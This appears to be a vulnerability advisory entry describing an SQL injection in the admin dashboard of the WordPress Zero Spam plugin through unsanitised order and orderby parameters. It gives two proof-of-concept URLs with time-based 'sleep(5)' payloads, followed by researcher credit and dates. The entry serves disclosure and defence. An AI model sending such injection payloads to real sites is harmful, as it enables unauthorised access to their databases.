The plugin does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection
With at least one IP in the “Blocked IPs” list: https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=1%20and%20sleep(5) https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=date_added&order=+and+sleep(5)
JrXnm
JrXnm
Yes
2022-02-18 (about 4 months ago)
2022-02-18 (about 4 months ago)
2022-04-09 (about 2 months ago)